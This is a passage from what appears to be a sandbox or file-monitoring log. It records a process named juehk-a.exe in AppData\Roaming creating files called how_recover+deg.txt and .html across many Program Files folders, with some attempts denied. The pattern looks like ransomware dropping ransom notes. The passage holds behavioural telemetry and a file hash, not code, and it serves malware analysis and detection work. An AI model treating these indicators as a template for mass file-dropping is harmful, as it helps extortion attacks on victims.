24074.          fid (ads:): 562949953521360
24075.          ntstatus: 0x0
24076.          CreateOptions: 0x60
24077.        file:
24078.          timestamp: 88243
24079.          mode: created
24080.          sequenceNumber: 1692
24081.          value: C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\ENES\how_recover+deg.txt
24082.          processinfo:
24083.            pid: 1648
24084.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24085.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24086.            ads:
24087.          fid (ads:): 562949953521361
24088.          ntstatus: 0x0
24089.          CreateOptions: 0x60
24090.        file:
24091.          timestamp: 88251
24092.          mode: created
24093.          sequenceNumber: 1693
24094.          value: C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\ENES\how_recover+deg.html
24095.          processinfo:
24096.            pid: 1648
24097.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24098.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24099.            ads:
24100.          fid (ads:): 562949953521362
24101.          ntstatus: 0x0
24102.          CreateOptions: 0x60
24103.        file:
24104.          timestamp: 88259
24105.          mode: created
24106.          sequenceNumber: 1694
24107.          value: C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\ENFR\how_recover+deg.txt
24108.          processinfo:
24109.            pid: 1648
24110.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24111.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24112.            ads:
24113.          fid (ads:): 562949953521363
24114.          ntstatus: 0x0
24115.          CreateOptions: 0x60
24116.        file:
24117.          timestamp: 88273
24118.          mode: created
24119.          sequenceNumber: 1695
24120.          value: C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\ENFR\how_recover+deg.html
24121.          processinfo:
24122.            pid: 1648
24123.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24124.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24125.            ads:
24126.          fid (ads:): 562949953521364
24127.          ntstatus: 0x0
24128.          CreateOptions: 0x60
24129.        file:
24130.          timestamp: 88284
24131.          mode: created
24132.          sequenceNumber: 1696
24133.          value: C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\ESEN\how_recover+deg.txt
24134.          processinfo:
24135.            pid: 1648
24136.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24137.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24138.            ads:
24139.          fid (ads:): 562949953521365
24140.          ntstatus: 0x0
24141.          CreateOptions: 0x60
24142.        file:
24143.          timestamp: 88291
24144.          mode: created
24145.          sequenceNumber: 1697
24146.          value: C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\ESEN\how_recover+deg.html
24147.          processinfo:
24148.            pid: 1648
24149.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24150.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24151.            ads:
24152.          fid (ads:): 562949953521366
24153.          ntstatus: 0x0
24154.          CreateOptions: 0x60
24155.        file:
24156.          timestamp: 88324
24157.          mode: created
24158.          sequenceNumber: 1698
24159.          value: C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\FREN\how_recover+deg.txt
24160.          processinfo:
24161.            pid: 1648
24162.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24163.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24164.            ads:
24165.          fid (ads:): 562949953521367
24166.          ntstatus: 0x0
24167.          CreateOptions: 0x60
24168.        file:
24169.          timestamp: 88346
24170.          mode: created
24171.          sequenceNumber: 1699
24172.          value: C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\FREN\how_recover+deg.html
24173.          processinfo:
24174.            pid: 1648
24175.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24176.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24177.            ads:
24178.          fid (ads:): 562949953521368
24179.          ntstatus: 0x0
24180.          CreateOptions: 0x60
24181.        file:
24182.          timestamp: 88352
24183.          mode: created
24184.          sequenceNumber: 1700
24185.          value: C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\how_recover+deg.txt
24186.          processinfo:
24187.            pid: 1648
24188.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24189.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24190.            ads:
24191.          fid (ads:): 562949953521369
24192.          ntstatus: 0x0
24193.          CreateOptions: 0x60
24194.        file:
24195.          timestamp: 88358
24196.          mode: created
24197.          sequenceNumber: 1701
24198.          value: C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\how_recover+deg.html
24199.          processinfo:
24200.            pid: 1648
24201.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24202.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24203.            ads:
24204.          fid (ads:): 562949953521370
24205.          ntstatus: 0x0
24206.          CreateOptions: 0x60
24207.        file:
24208.          timestamp: 88365
24209.          mode: created
24210.          sequenceNumber: 1702
24211.          value: C:\Program Files\Common Files\Microsoft Shared\Triedit\en-US\how_recover+deg.txt
24212.          processinfo:
24213.            pid: 1648
24214.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24215.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24216.            ads:
24217.          fid (ads:): 562949953521371
24218.          ntstatus: 0x0
24219.          CreateOptions: 0x60
24220.        file:
24221.          timestamp: 88379
24222.          mode: created
24223.          sequenceNumber: 1703
24224.          value: C:\Program Files\Common Files\Microsoft Shared\Triedit\en-US\how_recover+deg.html
24225.          processinfo:
24226.            pid: 1648
24227.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24228.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24229.            ads:
24230.          fid (ads:): 562949953521372
24231.          ntstatus: 0x0
24232.          CreateOptions: 0x60
24233.        file:
24234.          timestamp: 88386
24235.          mode: created
24236.          sequenceNumber: 1704
24237.          value: C:\Program Files\Common Files\Microsoft Shared\Triedit\how_recover+deg.txt
24238.          processinfo:
24239.            pid: 1648
24240.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24241.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24242.            ads:
24243.          fid (ads:): 562949953521373
24244.          ntstatus: 0x0
24245.          CreateOptions: 0x60
24246.        file:
24247.          timestamp: 88392
24248.          mode: created
24249.          sequenceNumber: 1705
24250.          value: C:\Program Files\Common Files\Microsoft Shared\Triedit\how_recover+deg.html
24251.          processinfo:
24252.            pid: 1648
24253.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24254.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24255.            ads:
24256.          fid (ads:): 562949953521374
24257.          ntstatus: 0x0
24258.          CreateOptions: 0x60
24259.        file:
24260.          timestamp: 88399
24261.          mode: created
24262.          sequenceNumber: 1706
24263.          value: C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\1033\how_recover+deg.txt
24264.          processinfo:
24265.            pid: 1648
24266.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24267.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24268.            ads:
24269.          fid (ads:): 562949953521375
24270.          ntstatus: 0x0
24271.          CreateOptions: 0x60
24272.        file:
24273.          timestamp: 88406
24274.          mode: created
24275.          sequenceNumber: 1707
24276.          value: C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\1033\how_recover+deg.html
24277.          processinfo:
24278.            pid: 1648
24279.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24280.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24281.            ads:
24282.          fid (ads:): 562949953521376
24283.          ntstatus: 0x0
24284.          CreateOptions: 0x60
24285.        file:
24286.          timestamp: 88412
24287.          mode: created
24288.          sequenceNumber: 1708
24289.          value: C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\how_recover+deg.txt
24290.          processinfo:
24291.            pid: 1648
24292.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24293.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24294.            ads:
24295.          fid (ads:): 562949953521377
24296.          ntstatus: 0x0
24297.          CreateOptions: 0x60
24298.        file:
24299.          timestamp: 88419
24300.          mode: created
24301.          sequenceNumber: 1709
24302.          value: C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\how_recover+deg.html
24303.          processinfo:
24304.            pid: 1648
24305.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24306.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24307.            ads:
24308.          fid (ads:): 562949953521378
24309.          ntstatus: 0x0
24310.          CreateOptions: 0x60
24311.        file:
24312.          timestamp: 88425
24313.          mode: created
24314.          sequenceNumber: 1710
24315.          value: C:\Program Files\Common Files\Microsoft Shared\VBA\how_recover+deg.txt
24316.          processinfo:
24317.            pid: 1648
24318.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24319.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24320.            ads:
24321.          fid (ads:): 562949953521379
24322.          ntstatus: 0x0
24323.          CreateOptions: 0x60
24324.        file:
24325.          timestamp: 88432
24326.          mode: created
24327.          sequenceNumber: 1711
24328.          value: C:\Program Files\Common Files\Microsoft Shared\VBA\how_recover+deg.html
24329.          processinfo:
24330.            pid: 1648
24331.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24332.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24333.            ads:
24334.          fid (ads:): 562949953521380
24335.          ntstatus: 0x0
24336.          CreateOptions: 0x60
24337.        file:
24338.          timestamp: 88439
24339.          mode: created
24340.          sequenceNumber: 1712
24341.          value: C:\Program Files\Common Files\Microsoft Shared\VC\how_recover+deg.txt
24342.          processinfo:
24343.            pid: 1648
24344.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24345.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24346.            ads:
24347.          fid (ads:): 562949953521381
24348.          ntstatus: 0x0
24349.          CreateOptions: 0x60
24350.        file:
24351.          timestamp: 88445
24352.          mode: created
24353.          sequenceNumber: 1713
24354.          value: C:\Program Files\Common Files\Microsoft Shared\VC\how_recover+deg.html
24355.          processinfo:
24356.            pid: 1648
24357.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24358.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24359.            ads:
24360.          fid (ads:): 562949953521382
24361.          ntstatus: 0x0
24362.          CreateOptions: 0x60
24363.        file:
24364.          timestamp: 88452
24365.          mode: created
24366.          sequenceNumber: 1714
24367.          value: C:\Program Files\Common Files\Microsoft Shared\VGX\how_recover+deg.txt
24368.          processinfo:
24369.            pid: 1648
24370.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24371.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24372.            ads:
24373.          fid (ads:): 562949953521383
24374.          ntstatus: 0x0
24375.          CreateOptions: 0x60
24376.        file:
24377.          timestamp: 88458
24378.          mode: created
24379.          sequenceNumber: 1715
24380.          value: C:\Program Files\Common Files\Microsoft Shared\VGX\how_recover+deg.html
24381.          processinfo:
24382.            pid: 1648
24383.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24384.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24385.            ads:
24386.          fid (ads:): 562949953521384
24387.          ntstatus: 0x0
24388.          CreateOptions: 0x60
24389.        file:
24390.          timestamp: 88503
24391.          mode: created
24392.          sequenceNumber: 1716
24393.          value: C:\Program Files\Common Files\Microsoft Shared\VSTO\10.0\1033\how_recover+deg.txt
24394.          processinfo:
24395.            pid: 1648
24396.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24397.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24398.            ads:
24399.          fid (ads:): 562949953521385
24400.          ntstatus: 0x0
24401.          CreateOptions: 0x60
24402.        file:
24403.          timestamp: 88509
24404.          mode: created
24405.          sequenceNumber: 1717
24406.          value: C:\Program Files\Common Files\Microsoft Shared\VSTO\10.0\1033\how_recover+deg.html
24407.          processinfo:
24408.            pid: 1648
24409.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24410.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24411.            ads:
24412.          fid (ads:): 562949953521386
24413.          ntstatus: 0x0
24414.          CreateOptions: 0x60
24415.        file:
24416.          timestamp: 88516
24417.          mode: created
24418.          sequenceNumber: 1718
24419.          value: C:\Program Files\Common Files\Microsoft Shared\VSTO\10.0\how_recover+deg.txt
24420.          processinfo:
24421.            pid: 1648
24422.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24423.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24424.            ads:
24425.          fid (ads:): 562949953521387
24426.          ntstatus: 0x0
24427.          CreateOptions: 0x60
24428.        file:
24429.          timestamp: 88522
24430.          mode: created
24431.          sequenceNumber: 1719
24432.          value: C:\Program Files\Common Files\Microsoft Shared\VSTO\10.0\how_recover+deg.html
24433.          processinfo:
24434.            pid: 1648
24435.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24436.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24437.            ads:
24438.          fid (ads:): 562949953521388
24439.          ntstatus: 0x0
24440.          CreateOptions: 0x60
24441.        file:
24442.          timestamp: 88536
24443.          mode: created
24444.          sequenceNumber: 1720
24445.          value: C:\Program Files\Common Files\Microsoft Shared\VSTO\how_recover+deg.txt
24446.          processinfo:
24447.            pid: 1648
24448.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24449.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24450.            ads:
24451.          fid (ads:): 562949953521389
24452.          ntstatus: 0x0
24453.          CreateOptions: 0x60
24454.        file:
24455.          timestamp: 88541
24456.          mode: created
24457.          sequenceNumber: 1721
24458.          value: C:\Program Files\Common Files\Microsoft Shared\VSTO\how_recover+deg.html
24459.          processinfo:
24460.            pid: 1648
24461.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24462.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24463.            ads:
24464.          fid (ads:): 562949953521390
24465.          ntstatus: 0x0
24466.          CreateOptions: 0x60
24467.        file:
24468.          timestamp: 88547
24469.          mode: created
24470.          sequenceNumber: 1722
24471.          value: C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\15\BIN\1033\how_recover+deg.txt
24472.          processinfo:
24473.            pid: 1648
24474.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24475.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24476.            ads:
24477.          fid (ads:): 562949953521391
24478.          ntstatus: 0x0
24479.          CreateOptions: 0x60
24480.        file:
24481.          timestamp: 88554
24482.          mode: created
24483.          sequenceNumber: 1723
24484.          value: C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\15\BIN\1033\how_recover+deg.html
24485.          processinfo:
24486.            pid: 1648
24487.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24488.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24489.            ads:
24490.          fid (ads:): 562949953521392
24491.          ntstatus: 0x0
24492.          CreateOptions: 0x60
24493.        file:
24494.          timestamp: 88558
24495.          mode: created
24496.          sequenceNumber: 1724
24497.          value: C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\15\BIN\how_recover+deg.txt
24498.          processinfo:
24499.            pid: 1648
24500.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24501.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24502.            ads:
24503.          fid (ads:): 562949953521393
24504.          ntstatus: 0x0
24505.          CreateOptions: 0x60
24506.        file:
24507.          timestamp: 88566
24508.          mode: created
24509.          sequenceNumber: 1725
24510.          value: C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\15\BIN\how_recover+deg.html
24511.          processinfo:
24512.            pid: 1648
24513.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24514.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24515.            ads:
24516.          fid (ads:): 562949953521394
24517.          ntstatus: 0x0
24518.          CreateOptions: 0x60
24519.        file:
24520.          timestamp: 88572
24521.          mode: created
24522.          sequenceNumber: 1726
24523.          value: C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\15\how_recover+deg.txt
24524.          processinfo:
24525.            pid: 1648
24526.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24527.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24528.            ads:
24529.          fid (ads:): 562949953521395
24530.          ntstatus: 0x0
24531.          CreateOptions: 0x60
24532.        file:
24533.          timestamp: 88580
24534.          mode: created
24535.          sequenceNumber: 1727
24536.          value: C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\15\how_recover+deg.html
24537.          processinfo:
24538.            pid: 1648
24539.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24540.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24541.            ads:
24542.          fid (ads:): 562949953521396
24543.          ntstatus: 0x0
24544.          CreateOptions: 0x60
24545.        file:
24546.          timestamp: 88586
24547.          mode: created
24548.          sequenceNumber: 1728
24549.          value: C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\how_recover+deg.txt
24550.          processinfo:
24551.            pid: 1648
24552.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24553.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24554.            ads:
24555.          fid (ads:): 562949953521397
24556.          ntstatus: 0x0
24557.          CreateOptions: 0x60
24558.        file:
24559.          timestamp: 88594
24560.          mode: created
24561.          sequenceNumber: 1729
24562.          value: C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\how_recover+deg.html
24563.          processinfo:
24564.            pid: 1648
24565.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24566.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24567.            ads:
24568.          fid (ads:): 562949953521398
24569.          ntstatus: 0x0
24570.          CreateOptions: 0x60
24571.        file:
24572.          timestamp: 88601
24573.          mode: created
24574.          sequenceNumber: 1730
24575.          value: C:\Program Files\Common Files\Microsoft Shared\how_recover+deg.txt
24576.          processinfo:
24577.            pid: 1648
24578.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24579.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24580.            ads:
24581.          fid (ads:): 562949953521399
24582.          ntstatus: 0x0
24583.          CreateOptions: 0x60
24584.        file:
24585.          timestamp: 88607
24586.          mode: created
24587.          sequenceNumber: 1731
24588.          value: C:\Program Files\Common Files\Microsoft Shared\how_recover+deg.html
24589.          processinfo:
24590.            pid: 1648
24591.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24592.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24593.            ads:
24594.          fid (ads:): 562949953521400
24595.          ntstatus: 0x0
24596.          CreateOptions: 0x60
24597.        file:
24598.          timestamp: 88614
24599.          mode: created
24600.          sequenceNumber: 1732
24601.          value: C:\Program Files\Common Files\Services\how_recover+deg.txt
24602.          processinfo:
24603.            pid: 1648
24604.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24605.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24606.            ads:
24607.          fid (ads:): 562949953521401
24608.          ntstatus: 0x0
24609.          CreateOptions: 0x60
24610.        file:
24611.          timestamp: 88620
24612.          mode: created
24613.          sequenceNumber: 1733
24614.          value: C:\Program Files\Common Files\Services\how_recover+deg.html
24615.          processinfo:
24616.            pid: 1648
24617.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24618.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24619.            ads:
24620.          fid (ads:): 562949953521402
24621.          ntstatus: 0x0
24622.          CreateOptions: 0x60
24623.        file:
24624.          timestamp: 88628
24625.          mode: failed
24626.          sequenceNumber: 1734
24627.          value: C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\en-US\enu-dsk\how_recover+deg.txt
24628.          processinfo:
24629.            pid: 1648
24630.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24631.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24632.            ads:
24633.          fid (ads:): 0
24634.          failure: open
24635.          ntstatus: 0xc0000022
24636.          CreateOptions: 0x60
24637.        file:
24638.          timestamp: 88634
24639.          mode: failed
24640.          sequenceNumber: 1735
24641.          value: C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\en-US\enu-dsk\how_recover+deg.html
24642.          processinfo:
24643.            pid: 1648
24644.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24645.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24646.            ads:
24647.          fid (ads:): 0
24648.          failure: open
24649.          ntstatus: 0xc0000022
24650.          CreateOptions: 0x60
24651.        file:
24652.          timestamp: 88640
24653.          mode: failed
24654.          sequenceNumber: 1736
24655.          value: C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\en-US\how_recover+deg.txt
24656.          processinfo:
24657.            pid: 1648
24658.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24659.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24660.            ads:
24661.          fid (ads:): 0
24662.          failure: open
24663.          ntstatus: 0xc0000022
24664.          CreateOptions: 0x60
24665.        file:
24666.          timestamp: 88647
24667.          mode: failed
24668.          sequenceNumber: 1737
24669.          value: C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\en-US\how_recover+deg.html
24670.          processinfo:
24671.            pid: 1648
24672.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24673.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24674.            ads:
24675.          fid (ads:): 0
24676.          failure: open
24677.          ntstatus: 0xc0000022
24678.          CreateOptions: 0x60
24679.        file:
24680.          timestamp: 88653
24681.          mode: failed
24682.          sequenceNumber: 1738
24683.          value: C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\how_recover+deg.txt
24684.          processinfo:
24685.            pid: 1648
24686.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24687.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24688.            ads:
24689.          fid (ads:): 0
24690.          failure: open
24691.          ntstatus: 0xc0000022
24692.          CreateOptions: 0x60
24693.        file:
24694.          timestamp: 88659
24695.          mode: failed
24696.          sequenceNumber: 1739
24697.          value: C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\how_recover+deg.html
24698.          processinfo:
24699.            pid: 1648
24700.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24701.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24702.            ads:
24703.          fid (ads:): 0
24704.          failure: open
24705.          ntstatus: 0xc0000022
24706.          CreateOptions: 0x60
24707.        file:
24708.          timestamp: 88665
24709.          mode: created
24710.          sequenceNumber: 1740
24711.          value: C:\Program Files\Common Files\SpeechEngines\Microsoft\how_recover+deg.txt
24712.          processinfo:
24713.            pid: 1648
24714.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24715.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24716.            ads:
24717.          fid (ads:): 562949953521403
24718.          ntstatus: 0x0
24719.          CreateOptions: 0x60
24720.        file:
24721.          timestamp: 88678
24722.          mode: created
24723.          sequenceNumber: 1741
24724.          value: C:\Program Files\Common Files\SpeechEngines\Microsoft\how_recover+deg.html
24725.          processinfo:
24726.            pid: 1648
24727.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24728.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24729.            ads:
24730.          fid (ads:): 562949953521404
24731.          ntstatus: 0x0
24732.          CreateOptions: 0x60
24733.        file:
24734.          timestamp: 88685
24735.          mode: created
24736.          sequenceNumber: 1742
24737.          value: C:\Program Files\Common Files\SpeechEngines\how_recover+deg.txt
24738.          processinfo:
24739.            pid: 1648
24740.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24741.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24742.            ads:
24743.          fid (ads:): 562949953521405
24744.          ntstatus: 0x0
24745.          CreateOptions: 0x60
24746.        file:
24747.          timestamp: 88691
24748.          mode: created
24749.          sequenceNumber: 1743
24750.          value: C:\Program Files\Common Files\SpeechEngines\how_recover+deg.html
24751.          processinfo:
24752.            pid: 1648
24753.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24754.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24755.            ads:
24756.          fid (ads:): 562949953521406
24757.          ntstatus: 0x0
24758.          CreateOptions: 0x60
24759.        file:
24760.          timestamp: 88698
24761.          mode: created
24762.          sequenceNumber: 1744
24763.          value: C:\Program Files\Common Files\System\ado\en-US\how_recover+deg.txt
24764.          processinfo:
24765.            pid: 1648
24766.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24767.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24768.            ads:
24769.          fid (ads:): 562949953521407
24770.          ntstatus: 0x0
24771.          CreateOptions: 0x60
24772.        file:
24773.          timestamp: 88704
24774.          mode: created
24775.          sequenceNumber: 1745
24776.          value: C:\Program Files\Common Files\System\ado\en-US\how_recover+deg.html
24777.          processinfo:
24778.            pid: 1648
24779.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24780.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24781.            ads:
24782.          fid (ads:): 562949953521408
24783.          ntstatus: 0x0
24784.          CreateOptions: 0x60
24785.        file:
24786.          timestamp: 88710
24787.          mode: created
24788.          sequenceNumber: 1746
24789.          value: C:\Program Files\Common Files\System\ado\how_recover+deg.txt
24790.          processinfo:
24791.            pid: 1648
24792.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24793.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24794.            ads:
24795.          fid (ads:): 562949953521409
24796.          ntstatus: 0x0
24797.          CreateOptions: 0x60
24798.        file:
24799.          timestamp: 88716
24800.          mode: created
24801.          sequenceNumber: 1747
24802.          value: C:\Program Files\Common Files\System\ado\how_recover+deg.html
24803.          processinfo:
24804.            pid: 1648
24805.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24806.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24807.            ads:
24808.          fid (ads:): 562949953521410
24809.          ntstatus: 0x0
24810.          CreateOptions: 0x60
24811.        file:
24812.          timestamp: 88722
24813.          mode: created
24814.          sequenceNumber: 1748
24815.          value: C:\Program Files\Common Files\System\en-US\how_recover+deg.txt
24816.          processinfo:
24817.            pid: 1648
24818.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24819.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24820.            ads:
24821.          fid (ads:): 562949953521411
24822.          ntstatus: 0x0
24823.          CreateOptions: 0x60
24824.        file:
24825.          timestamp: 88729
24826.          mode: created
24827.          sequenceNumber: 1749
24828.          value: C:\Program Files\Common Files\System\en-US\how_recover+deg.html
24829.          processinfo:
24830.            pid: 1648
24831.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24832.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24833.            ads:
24834.          fid (ads:): 562949953521412
24835.          ntstatus: 0x0
24836.          CreateOptions: 0x60
24837.        file:
24838.          timestamp: 88758
24839.          mode: created
24840.          sequenceNumber: 1750
24841.          value: C:\Program Files\Common Files\System\msadc\en-US\how_recover+deg.txt
24842.          processinfo:
24843.            pid: 1648
24844.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24845.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24846.            ads:
24847.          fid (ads:): 562949953521413
24848.          ntstatus: 0x0
24849.          CreateOptions: 0x60
24850.        file:
24851.          timestamp: 88765
24852.          mode: created
24853.          sequenceNumber: 1751
24854.          value: C:\Program Files\Common Files\System\msadc\en-US\how_recover+deg.html
24855.          processinfo:
24856.            pid: 1648
24857.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24858.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24859.            ads:
24860.          fid (ads:): 562949953521414
24861.          ntstatus: 0x0
24862.          CreateOptions: 0x60
24863.        file:
24864.          timestamp: 88771
24865.          mode: created
24866.          sequenceNumber: 1752
24867.          value: C:\Program Files\Common Files\System\msadc\how_recover+deg.txt
24868.          processinfo:
24869.            pid: 1648
24870.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
24871.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
24872.            ads:
24873.          fid (ads:): 562949953521415
24874.          ntstatus: 0x0
24875.          CreateOptions: 0x60
24876.        file:
24877.          timestamp: 88778
24878.          mode: created
24879.          sequenceNumber: 1753
24880.          value: C:\Program Files\Common Files\System\msadc\how_recover+deg.html
24881.          processinfo:
24882.            pid: 1648
24883.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
